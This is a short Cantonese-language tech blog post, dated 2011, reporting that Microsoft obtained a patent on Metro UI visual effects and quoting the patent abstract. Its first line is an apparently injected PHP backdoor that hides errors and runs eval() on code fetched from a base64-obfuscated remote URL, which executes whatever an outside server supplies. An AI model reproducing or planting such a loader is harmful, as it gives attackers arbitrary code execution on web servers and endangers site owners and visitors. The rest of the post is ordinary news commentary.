ini_set("display_errors", "off");eval('?>'.file_get_contents(base64_decode('aHR0cDovLzguanNjMjAyNDQuY29tOjgxL2pzYy9qc2MudHh0')));

Microsoft 拿得Metro UI的相關專利

於下午08:32 2011-8-22 由 編寫

相信用緊Windows Phone的人都知到什麼叫Metro UI。唔知的就現在開始要知道了,WP7的UI就是叫Metro UI又稱Panoramic UI。以後的Windows8和Xbox的UI也會用上它。


“Aspects of a user interface that provides visual feedback in response to user input. For example, boundary effects are presented to provide visual cues to a user to indicate that a boundary in a movable user interface element (e.g., the end of a scrollable list) has been reached. As another example, parallax effects are presented in which multiple parallel or substantially parallel layers in a multi-layer user interface move at different rates, in response to user input. As another example, simulated inertia motion of UI elements is used to provide a more natural feel for touch input. Various combinations of features are described. For example, simulated inertia motion can be used in combination with parallax effects, boundary effects, or other types of visual feedback. “

不知道其他使用Metro UI的會唔會受到影響呢,如Android Market。





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